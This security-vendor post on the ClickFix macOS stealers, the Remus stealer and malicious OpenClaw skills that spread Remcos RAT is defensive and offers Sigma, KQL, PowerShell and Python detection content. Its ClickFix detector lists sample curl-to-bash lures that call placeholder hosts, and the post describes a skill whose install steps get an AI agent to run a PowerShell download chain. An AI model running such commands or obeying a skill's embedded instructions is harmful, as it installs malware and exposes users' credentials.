
Remus Stealer, ClickFix macOS Infostealers, and Malicious OpenClaw Skills: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
May 10, 2026

Recent OTX pulses highlight a surge in criminally motivated campaigns utilizing evolving social engineering and supply chain attacks. Threat actors are actively targeting macOS users with ClickFix campaigns—luring victims into executing malicious Terminal commands disguised as utility fixes—delivering families like Macsync, Shub Stealer, and AMOS. Simultaneously, the Windows ecosystem faces a significant evolution in information stealers with Remus, a successor to Lumma Stealer designed to bypass application-bound encryption. Furthermore, attackers have weaponized the AI ecosystem by publishing malicious OpenClaw skills that distribute Remcos RAT and GhostLoader, leveraging AI agents to execute obfuscated PowerShell commands.

Threat Actor / Malware Profile

ClickFix & macOS Infostealers

  • Malware Families: Macsync, Shub Stealer, AMOS, PhantomPulse.
  • Distribution Method: Social engineering via blog sites and content platforms hosting fake troubleshooting guides. Victims are tricked into running specific Terminal commands.
  • Payload Behavior: Commands downloaded via curl or similar tools, often piped to bash, fetch and execute the infostealer.
  • Objective: Exfiltration of system data, iCloud keychains, and browser credentials.
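As an added example (not part of the pulse or the Security Arsenal rules), a Python triage function that applies the payload pattern above to macOS process command lines: a downloader or decoder stage piped into an interpreter, or downloaded content substituted inline. The sample command lines are constructed, and the helper names, domains and script names are assumptions.

```python
import re
import shlex

# Constructed sample command lines (not indicators from the pulses); the domains
# use the reserved .invalid TLD so nothing here resolves.
SAMPLE_COMMANDS = [
    'curl -fsSL https://blog.example.invalid/fix.sh | bash',
    'echo "Y3VybCAtcyBodHRwczovL2V4YW1wbGUuaW52YWxpZC9hIHwgYmFzaA==" | base64 -d | sh',
    'brew install wget',
    'curl -o ~/Downloads/report.pdf https://files.example.invalid/report.pdf',
    'python3 -c "$(curl -s https://cdn.example.invalid/u)"',
    'ls -la /Applications',
]

DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"bash", "sh", "zsh", "osascript", "python3", "python"}
DECODERS = {"base64", "xxd", "openssl"}

def pipeline_heads(cmdline):
    """First word of each pipe stage, directory prefix stripped (/bin/bash -> bash).
    The split on '|' is naive (ignores quoting), which is acceptable for triage."""
    heads = []
    for stage in (s.strip() for s in cmdline.split("|") if s.strip()):
        try:
            tokens = shlex.split(stage)
        except ValueError:          # unbalanced quotes: fall back to whitespace split
            tokens = stage.split()
        heads.append(tokens[0].rsplit("/", 1)[-1] if tokens else "")
    return heads

def classify_clickfix(cmdline):
    """Return the reasons a command line matches a ClickFix lure pattern ([] if none)."""
    reasons = []
    heads = pipeline_heads(cmdline)
    for upstream, downstream in zip(heads, heads[1:]):
        if upstream in DOWNLOADERS and downstream in INTERPRETERS:
            reasons.append("download piped to interpreter")
        if upstream in DECODERS and downstream in INTERPRETERS:
            reasons.append("decoded payload piped to interpreter")
    # Inline substitution: bash -c "$(curl ...)" or python3 -c "`wget ...`"
    inline = re.search(r"\$\(\s*(?:curl|wget)\b|`\s*(?:curl|wget)\b", cmdline)
    if inline and heads and heads[0] in INTERPRETERS:
        reasons.append("interpreter executes downloaded content inline")
    return reasons

def scan(commands):
    """Map each suspicious command line to its reasons; benign lines are omitted."""
    return {cmd: reasons for cmd in commands if (reasons := classify_clickfix(cmd))}
```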

Remus Stealer (Lumma Evolution)

  • Malware Family: Remus (evolution of Lumma Stealer).
  • Origin: Emerged following the doxxing of Lumma Stealer core members in late 2025.
  • Capability: 64-bit info-stealer specifically designed to bypass browser application-bound encryption, targeting credentials and cryptocurrency wallets.
  • C2 & Persistence: Uses innovative injection techniques and likely Ethereum blockchain-related C2 obfuscation (Etherhiding) for resilience.

OpenClaw / Remcos RAT

  • Malware Families: Remcos RAT, GhostLoader.
  • Vector: "DeepSeek-Claw" skill within the OpenClaw AI agent framework.
  • Attack Chain: The skill provides malicious installation instructions -> AI/Developer executes PowerShell command -> Downloads MSI package -> Sideloads malicious DLL via signed GoToMeeting executable (GhostLoader technique).
  • Behavior: Remote Access Trojan (RAT) capabilities allowing full control, surveillance, and data theft.
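The attack chain above, as an added detection example in Python (not part of the pulse or the Security Arsenal content): it correlates image-load events that look like a sideload (signed loader, unsigned DLL from the same user-writable directory) with a process ancestry of msiexec.exe running under PowerShell. The event schema, process names and paths are constructed assumptions; the GoToMeeting executable and DLL names are not on the page, so placeholders stand in for them.

```python
import ntpath

# Constructed EDR-style events (not from the pulses). The schema is an assumption for
# this example: process events carry pid/ppid/image; image-load events carry the loading
# process, the DLL, and each file's signer ("" means unsigned).
TMP = r"C:\Users\dev\AppData\Local\Temp\pkg"          # constructed MSI extraction dir
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe"},
    {"type": "process", "pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "process", "pid": 300, "ppid": 200, "image": r"C:\Windows\System32\msiexec.exe"},
    {"type": "process", "pid": 400, "ppid": 300, "image": TMP + r"\meeting_host.exe"},
    {"type": "imageload", "pid": 400, "image": TMP + r"\meeting_host.exe",
     "signer": "Vendor (constructed)", "dll": TMP + r"\version.dll", "dll_signer": ""},
    {"type": "imageload", "pid": 400, "image": TMP + r"\meeting_host.exe",
     "signer": "Vendor (constructed)", "dll": r"C:\Windows\System32\kernel32.dll",
     "dll_signer": "Microsoft Windows"},
    {"type": "process", "pid": 500, "ppid": 100, "image": r"C:\Program Files\Tool\tool.exe"},
    {"type": "imageload", "pid": 500, "image": r"C:\Program Files\Tool\tool.exe",
     "signer": "Tool Ltd.", "dll": r"C:\Program Files\Tool\helper.dll", "dll_signer": ""},
]

USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

def is_suspicious_sideload(ev):
    """Signed loader pulls an unsigned DLL from its own directory under a user-writable path."""
    exe_dir = ntpath.dirname(ev["image"]).lower()
    dll_dir = ntpath.dirname(ev["dll"]).lower()
    return (ev["signer"] != "" and ev["dll_signer"] == ""
            and exe_dir == dll_dir and exe_dir.startswith(USER_WRITABLE_PREFIXES))

def ancestry(pid, parents, images):
    """Executable basenames from pid up to the root, e.g. ['x.exe', 'msiexec.exe', ...]."""
    chain = []
    while pid in images:
        chain.append(ntpath.basename(images[pid]).lower())
        pid = parents.get(pid)
    return chain

def find_ghostloader_chains(events):
    """Sideload events whose process descends from msiexec.exe running under PowerShell."""
    parents = {e["pid"]: e["ppid"] for e in events if e["type"] == "process"}
    images = {e["pid"]: e["image"] for e in events if e["type"] == "process"}
    hits = []
    for ev in events:
        if ev["type"] != "imageload" or not is_suspicious_sideload(ev):
            continue
        chain = ancestry(ev["pid"], parents, images)
        if "msiexec.exe" in chain and any(c in ("powershell.exe", "pwsh.exe") for c in chain):
            hits.append({"pid": ev["pid"], "dll": ev["dll"], "chain": chain})
    return hits
```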

IOC Analysis

The provided indicators cover multiple infrastructure types:

  • Domains: Multiple suspicious domains (e.g., jihiz.com, malext.com, dropras.xyz) associated with ClickFix and OpenClaw C2 hosting. SOC teams should block these at the DNS/Proxy level.
  • IPv4 Addresses: C2 infrastructure including 45.94.47.204 (ClickFix) and 217.156.122.x subnet (Remus). These should be blocked on firewalls and analyzed for historical logs.
  • File Hashes (MD5/SHA1): Specific to the Remcos/GoToMeeting MSI packages (e.g., 1c267cab0a800a7b2d598bc1b112d5ce). EDR solutions should be configured to alert on execution or presence of these hashes.

Detection Engineering

```yaml
---
id: 9a8b7c6d-1e2f-3a4b-5c6d-7e8f9a0b1c2d
title: PowerShell Command Downloads MSI File - OpenClaw Vector
description: Detects PowerShell commands that download MSI files, a technique observed in the OpenClaw campaign delivering Remcos RAT via DeepSeek-Claw skills.
status: experimental
author: Security Arsenal
date: 2026/05/11
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'wget'
            - 'curl'
            - 'DownloadFile'
    # Both selections must match (this is not an exclusion filter), so it is named as a selection
    selection_msi:
        CommandLine|contains: '.msi'
    condition: selection and selection_msi
falsepositives:
    - System administration software installation
level: high
---
id: b1c2d3e4-5f6a-7b8c-9d0e-1f2a3b4c5d6e
title: Potential Remcos RAT Installation - Registry Key
description: Detects Run/RunOnce values whose data references Remcos, a persistence pattern seen in the OpenClaw/Remcos campaign.
status: experimental
author: Security Arsenal
date: 2026/05/11
tags:
    - attack.persistence
    - attack.t1547.001
logsource:
    product: windows
    # registry_set (value written, Sysmon Event ID 13) carries the Details field; registry_add (key created) does not
    category: registry_set
detection:
    selection:
        TargetObject|contains:
            - '\Software\Microsoft\Windows\CurrentVersion\Run'
            - '\Software\Microsoft\Windows\CurrentVersion\RunOnce'
        Details|contains:
            - 'Remcos'
            - 'System32\remcos'
    condition: selection
falsepositives:
    - Legitimate software using similar names (rare)
level: high
---
id: c2d3e4f5-6a7b-8c9d-0e1f-2a3b4c5d6e7f
title: Browser Encryption Bypass Attempt - Suspicious Process Access
description: Detects non-browser processes opening handles to Chromium-based browser processes with memory-read or injection access masks, indicative of stealers like Remus/Lumma attempting to bypass application-bound encryption (ABE) from inside the browser's own context. Process-access telemetry records target processes, not files, so the rule keys on the browser executables rather than the profile directory.
status: experimental
author: Security Arsenal
date: 2026/05/11
tags:
    - attack.credential_access
    - attack.t1005
logsource:
    product: windows
    category: process_access
detection:
    selection_target:
        TargetImage|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\brave.exe'
    selection_granted:
        GrantedAccess|contains:
            - '0x1010'
            - '0x1410'
            - '0x143a'
    # Browsers open handles to their own renderer/utility children constantly
    filter_browser_self:
        SourceImage|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\brave.exe'
    condition: selection_target and selection_granted and not filter_browser_self
falsepositives:
    - Legitimate backup, EDR, or browser management tools
level: medium
```


```kql
// Hunt for connections to known Remus and ClickFix IPs
DeviceNetworkEvents
| where RemoteIP in ("45.94.47.204", "217.156.122.57", "217.156.122.75", "217.156.122.12", "45.151.106.110")
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteIP, RemoteURL, InitiatingProcessCommandLine

// Hunt for execution of file hashes associated with OpenClaw/Remcos
DeviceProcessEvents
| where SHA1 in ("470c3803bd5a4770eb5470a84a831f187f591c64") or MD5 in ("1c267cab0a800a7b2d598bc1b112d5ce", "2a5f619c966ef79f4586a433e3d5e7ba", "2c4b7c8b48e6b4e5f3e8854f2abfedb5", "82536825e700f4c863238a90dd314687", "cc1af839a956c8e2bf8e721f5d3b7373")
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName
```


```powershell
# IOC Hunt Script for Remcos/OpenClaw Related Files
# Checks for the specific MD5 hashes mentioned in the OpenClaw pulse

$targetHashes = @(
    "1c267cab0a800a7b2d598bc1b112d5ce",
    "2a5f619c966ef79f4586a433e3d5e7ba",
    "2c4b7c8b48e6b4e5f3e8854f2abfedb5",
    "82536825e700f4c863238a90dd314687",
    "cc1af839a956c8e2bf8e721f5d3b7373"
)

Write-Host "Scanning for malicious file hashes..." -ForegroundColor Yellow

# Get files in common download/appdata directories (limit to last 7 days for performance)
$paths = @("$env:USERPROFILE\Downloads", "$env:APPDATA", "$env:LOCALAPPDATA")

foreach ($path in $paths) {
    if (Test-Path $path) {
        Get-ChildItem -Path $path -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) } |
        ForEach-Object {
            # Get-FileHash returns uppercase hex; -in compares case-insensitively by default
            $hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
            if ($hash -in $targetHashes) {
                Write-Host "[MATCH] Malicious file found: $($_.FullName)" -ForegroundColor Red
                Write-Host "Hash: $hash" -ForegroundColor Red
            }
        }
    }
}

Write-Host "Scan complete."
```


Response Priorities

  • Immediate:
      ◦ Block all listed domains and IP addresses at the perimeter firewall and proxy servers.
      ◦ Initiate a hunt for the specific file hashes provided in the OpenClaw pulse across all endpoints.
      ◦ Review DNS logs for resolutions to dropras.xyz and trackpipe.dev.

  • 24 Hours:
      ◦ Credential Audit: Given Remus Stealer's capability to bypass browser encryption, force a password reset for high-privilege accounts and for users who may have been exposed to the ClickFix or Remus campaigns.
      ◦ Session Review: Analyze Active Directory logs for anomalous logon attempts originating from the Remus C2 IP ranges.

  • 1 Week:
      ◦ Browser Hardening: Enforce enterprise browser policies to disable or restrict developer tools and extensions where possible, limiting what an infostealer can reach.
      ◦ AI Governance: Review and restrict the use of AI agent frameworks (such as OpenClaw) within the development environment, and enforce strict sandboxing for code and commands produced by AI agents.
      ◦ macOS Security: Deploy configuration profiles to restrict the execution of unsigned terminal commands or scripts downloaded from the internet (Gatekeeper hardening).
